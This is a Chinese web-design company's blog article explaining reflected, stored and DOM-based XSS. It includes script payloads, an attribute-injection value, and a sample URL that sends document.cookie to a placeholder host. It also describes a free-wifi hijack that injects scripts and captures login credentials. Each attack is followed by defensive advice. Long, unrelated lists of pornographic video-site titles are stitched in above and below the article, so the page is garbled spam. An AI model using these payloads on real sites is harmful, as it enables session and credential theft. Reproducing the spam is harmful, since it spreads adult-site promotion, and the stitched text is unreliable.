国产一区在线免费_麻豆91蜜桃_欧美xxxx黑人又粗又长密月_久久久久久久久四区三区_国产精品青青草_久久伊人一区二区_一区二区三区av_精品久久久久久亚洲_国产一区福利视频_99国产视频

億萬聯(lián)合 — 專業(yè)網(wǎng)站建設(shè)服務(wù)商 17786980340
您的位置:首頁 > 資訊 > 網(wǎng)絡(luò)學(xué)堂

網(wǎng)站安全之XSS攻擊

發(fā)布時(shí)間:2017年08月07日作者:波哥 瀏覽:11172

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點(diǎn)是“跨域”和“客戶端執(zhí)行”。

有人將XSS攻擊分為三種,分別是:

1. Reflected XSS(基于反射的XSS攻擊)

2. Stored XSS(基于存儲(chǔ)的XSS攻擊)

3. DOM-based or local XSS(基于DOM或本地的XSS攻擊)


Reflected XSS

基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊。

例子:

1. 做個(gè)假設(shè),當(dāng)亞馬遜在搜索書籍,搜不到書的時(shí)候顯示提交的名稱。

2. 在搜索框搜索內(nèi)容,填入“<script>alert('handsome boy')</script>”, 點(diǎn)擊搜索。

3. 當(dāng)前端頁面沒有對(duì)返回的數(shù)據(jù)進(jìn)行過濾,直接顯示在頁面上, 這時(shí)就會(huì)alert那個(gè)字符串出來。

4. 進(jìn)而可以構(gòu)造獲取用戶cookies的地址,通過QQ群或者垃圾郵件,來讓其他人點(diǎn)擊這個(gè)地址:

http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

PS:這個(gè)地址當(dāng)然是沒效的,只是舉例子而已。

結(jié)論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個(gè)像樣的XSS攻擊。

開發(fā)安全措施:

1. 前端在顯示服務(wù)端數(shù)據(jù)時(shí)候,不僅是標(biāo)簽內(nèi)容需要過濾、轉(zhuǎn)義,就連屬性值也都可能需要。

2. 后端接收請(qǐng)求時(shí),驗(yàn)證請(qǐng)求是否為攻擊請(qǐng)求,攻擊則屏蔽。

例如:

標(biāo)簽:

<span><script>alert('handsome boy')</script></span>
轉(zhuǎn)義
<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>
屬性:

如果一個(gè)input的value屬性值是

瑯琊榜" onclick="javascript:alert('handsome boy')
就可能出現(xiàn)

<input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')">

點(diǎn)擊input導(dǎo)致攻擊腳本被執(zhí)行,解決方式可以對(duì)script或者雙引號(hào)進(jìn)行過濾。


Stored XSS

基于存儲(chǔ)的XSS攻擊,是通過發(fā)表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲(chǔ)在服務(wù)器,每個(gè)訪問該帖子/文章的人就會(huì)觸發(fā)執(zhí)行。

例子:

1. 發(fā)一篇文章,里面包含了惡意腳本

今天天氣不錯(cuò)啊!<script>alert('handsome boy')</script>
2. 后端沒有對(duì)文章進(jìn)行過濾,直接保存文章內(nèi)容到數(shù)據(jù)庫。


3. 當(dāng)其他看這篇文章的時(shí)候,包含的惡意腳本就會(huì)執(zhí)行。

PS:因?yàn)榇蟛糠治恼率潜4嬲麄€(gè)HTML內(nèi)容的,前端顯示時(shí)候也不做過濾,就極可能出現(xiàn)這種情況。

結(jié)論:

后端盡可能對(duì)提交數(shù)據(jù)做過濾,在場(chǎng)景需求而不過濾的情況下,前端就需要做些處理了。

開發(fā)安全措施:

1. 首要是服務(wù)端要進(jìn)行過濾,因?yàn)榍岸说男r?yàn)可以被繞過。

2. 當(dāng)服務(wù)端不校驗(yàn)時(shí)候,前端要以各種方式過濾里面可能的惡意腳本,例如script標(biāo)簽,將特殊字符轉(zhuǎn)換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個(gè)免費(fèi)的wifi,但是提供免費(fèi)wifi的網(wǎng)關(guān)會(huì)往你訪問的任何頁面插入一段腳本或者是直接返回一個(gè)釣魚頁面,從而植入惡意腳本。這種直接存在于頁面,無須經(jīng)過服務(wù)器返回就是基于本地的XSS攻擊。


例子1:
1. 提供一個(gè)免費(fèi)的wifi。
1. 開啟一個(gè)特殊的DNS服務(wù),將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設(shè)置為我們的電腦IP。
2. 之后連上wifi的用戶打開任何網(wǎng)站,請(qǐng)求都將被我們截取到。我們根據(jù)http頭中的host字段來轉(zhuǎn)發(fā)到真正服務(wù)器上。
3. 收到服務(wù)器返回的數(shù)據(jù)之后,我們就可以實(shí)現(xiàn)網(wǎng)頁腳本的注入,并返回給用戶。
4. 當(dāng)注入的腳本被執(zhí)行,用戶的瀏覽器將依次預(yù)加載各大網(wǎng)站的常用腳本庫。


PS:例子和圖片來自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請(qǐng)注意!
這個(gè)其實(shí)就是wifi流量劫持,中間人可以看到用戶的每一個(gè)請(qǐng)求,可以在頁面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚頁面。



例子2:
1. 還是提供一個(gè)免費(fèi)wifi
2. 在我們電腦上進(jìn)行抓包
3. 分析數(shù)據(jù),可以獲取用戶的微信朋友圈、郵箱、社交網(wǎng)站帳號(hào)數(shù)據(jù)(HTTP)等。


PS:這個(gè)是我的測(cè)試,在51job頁面登錄時(shí)進(jìn)行抓包,可以獲取帳號(hào)密碼。



結(jié)論:
這攻擊其實(shí)跟網(wǎng)站本身沒有什么關(guān)系,只是數(shù)據(jù)被中間人獲取了而已,而由于HTTP是明文傳輸?shù)模允菢O可能被竊取的。


開發(fā)安全措施:
1. 使用HTTPS!就跟我前面《HTTP與HTTPS握手的那些事》這篇文章說的,HTTPS會(huì)在請(qǐng)求數(shù)據(jù)之前進(jìn)行一次握手,使得客戶端與服務(wù)端都有一個(gè)私鑰,服務(wù)端用這個(gè)私鑰加密,客戶端用這個(gè)私鑰解密,這樣即使數(shù)據(jù)被人截取了,也是加密后的數(shù)據(jù)。

總結(jié)

XSS攻擊的特點(diǎn)就是:盡一切辦法在目標(biāo)網(wǎng)站上執(zhí)行非目標(biāo)網(wǎng)站上原有的腳本(某篇文章說的)。本地的XSS攻擊的示例2其實(shí)不算XSS攻擊,只是簡(jiǎn)單流量劫持。前兩種XSS攻擊是我們開發(fā)時(shí)候要注意的,而流量劫持的則可以使用HTTPS提高安全性。

870
分類:

您還沒有登錄,請(qǐng)先登錄

4008-4008-80

027-87827780

請(qǐng)點(diǎn)擊QQ圖標(biāo)咨詢客服;為避免丟失消息,請(qǐng)?zhí)砑観Q好友
提交需求
国产一区在线免费_麻豆91蜜桃_欧美xxxx黑人又粗又长密月_久久久久久久久四区三区_国产精品青青草_久久伊人一区二区_一区二区三区av_精品久久久久久亚洲_国产一区福利视频_99国产视频
欧美一级久久久| 在线成人小视频| 欧美系列日韩一区| 亚洲国产精品自拍| 欧洲一区在线电影| 伊人夜夜躁av伊人久久| 色爱区综合激月婷婷| 亚洲午夜久久久久久久久电影院| 欧美日韩国产精品成人| 久久精品国产亚洲高清剧情介绍| 久久午夜国产精品| 91丨国产丨九色丨pron| 亚洲小少妇裸体bbw| 精品乱码亚洲一区二区不卡| 懂色av一区二区三区免费观看 | gogo大胆日本视频一区| 亚洲精品免费在线观看| 91精品国产品国语在线不卡| 国产精一品亚洲二区在线视频| 日本一区二区三区dvd视频在线| 一本久道久久综合中文字幕| 日本欧美肥老太交大片| 日本一区二区高清| 欧美日韩国产a| 成人av动漫网站| 视频一区欧美精品| 国产精品嫩草99a| 日韩视频一区二区三区| 99re6这里只有精品视频在线观看| 日韩电影在线观看网站| 国产精品日韩成人| 久久综合精品国产一区二区三区| 欧美丝袜第三区| a亚洲天堂av| 成人国产亚洲欧美成人综合网| 蜜臀av一区二区在线观看| 一区二区三区四区av| 中文字幕第一页久久| 久久久久久一级片| 日韩女优毛片在线| 欧美二区三区91| 欧美性高清videossexo| 91亚洲男人天堂| 国产一区二区网址| 日本不卡一区二区三区 | 日韩久久久精品| 色婷婷精品久久二区二区蜜臀av| 国产精品资源在线观看| 日韩在线a电影| 亚洲一区在线观看免费观看电影高清| 精品福利一区二区三区 | 99精品1区2区| 国产成人在线观看免费网站| 久久机这里只有精品| 日本sm残虐另类| 久久精品国产色蜜蜜麻豆| 麻豆中文一区二区| 毛片一区二区三区| 久久成人综合网| 免费观看久久久4p| 九色|91porny| 国产精品系列在线观看| 精品一区二区三区视频 | 成人精品视频一区二区三区尤物| 另类调教123区 | 久久99精品国产.久久久久久| 亚洲成人av中文| 亚洲成人av中文| 奇米一区二区三区av| 蜜臀va亚洲va欧美va天堂| 精品系列免费在线观看| 国产精品亚洲一区二区三区在线 | 精品日产卡一卡二卡麻豆| 久久久久久久免费视频了| 国产亚洲综合在线| 亚洲欧美激情小说另类| 亚洲成a人v欧美综合天堂 | av不卡在线播放| 欧美撒尿777hd撒尿| 精品少妇一区二区三区视频免付费| 欧美一区二区美女| 国产欧美一区二区精品婷婷| 亚洲日本丝袜连裤袜办公室| 无吗不卡中文字幕| 国内精品免费在线观看| 9i看片成人免费高清| 欧美一区二区三区视频在线| 国产性做久久久久久| 欧美日韩一区 二区 三区 久久精品| 日韩视频免费观看高清完整版在线观看 | 日韩毛片精品高清免费| 日韩激情av在线| 高清成人免费视频| 欧美一区二区三区精品| 欧美高清在线精品一区| 日日夜夜免费精品视频| 99久久精品国产精品久久| 欧美一区二区成人| 亚洲欧美日韩久久| 国内国产精品久久| 欧美系列一区二区| 综合久久给合久久狠狠狠97色| 日韩二区在线观看| 在线观看日韩一区| 中文无字幕一区二区三区| 日韩不卡免费视频| 色综合久久综合中文综合网| 欧美tk丨vk视频| 丝袜脚交一区二区| 欧美性受xxxx| 亚洲免费视频成人| www.色精品| 久久久精品中文字幕麻豆发布| 日韩高清一级片| 在线精品观看国产| 最好看的中文字幕久久| 国产成人8x视频一区二区| 亚洲精品在线观| 日本在线播放一区二区三区| 欧美性高清videossexo| 亚洲品质自拍视频网站| 成人的网站免费观看| 久久精品视频网| 国产精品中文有码| 精品国产sm最大网站| 国内成+人亚洲+欧美+综合在线 | 26uuu另类欧美| 肉色丝袜一区二区| 欧美一区二区三区不卡| 日韩在线一区二区三区| 欧美日韩国产123区| 手机精品视频在线观看| 欧美一卡在线观看| 美日韩一级片在线观看| 欧美本精品男人aⅴ天堂| 美女视频网站黄色亚洲| 精品国产伦一区二区三区免费| 日韩精品一级中文字幕精品视频免费观看 | 亚洲一级二级三级| 欧美伊人久久大香线蕉综合69 | 日韩午夜三级在线| 韩国女主播成人在线观看| 国产日韩欧美高清在线| 成人sese在线| 亚洲日本护士毛茸茸| 欧美三级电影在线观看| 视频在线观看国产精品| 欧美不卡在线视频| 99久久免费精品| 一区二区三区产品免费精品久久75| 欧美优质美女网站| 久久国产剧场电影| 中文乱码免费一区二区| 在线观看日韩精品| 日韩不卡免费视频| 久久精品欧美日韩| 色哟哟精品一区| 日本午夜精品视频在线观看| 久久先锋影音av| 一本一道久久a久久精品| 丝袜美腿亚洲一区二区图片| 精品国产乱码久久久久久闺蜜| 丁香六月综合激情| 亚洲精品一二三| 91精品国产综合久久国产大片| 国产在线国偷精品产拍免费yy| 欧美国产综合色视频| 日韩黄色小视频| 国产精品久久久久婷婷 | 国产69精品一区二区亚洲孕妇 | 三级欧美在线一区| 国产精品午夜在线| 欧美日韩在线三级| 国产成人精品综合在线观看| 夜夜嗨av一区二区三区| 精品国产91洋老外米糕| 欧美体内she精视频| 丰满少妇久久久久久久| 蜜桃视频在线观看一区二区| 亚洲黄一区二区三区| 欧美这里有精品| 精品一区二区三区在线播放| 一区二区欧美精品| 亚洲国产精品黑人久久久| 欧美日韩在线直播| 色综合久久久久综合体桃花网| 国产精品一二一区| 久久丁香综合五月国产三级网站| 亚洲黄色av一区| 国产精品伦理一区二区| 亚洲精品一区二区三区福利| 欧美日本一区二区| 色综合久久综合| 成人污污视频在线观看| 激情五月婷婷综合| 日本伊人色综合网| 日日夜夜精品视频免费| 亚洲va欧美va天堂v国产综合| 亚洲视频免费看| 国产精品污污网站在线观看 |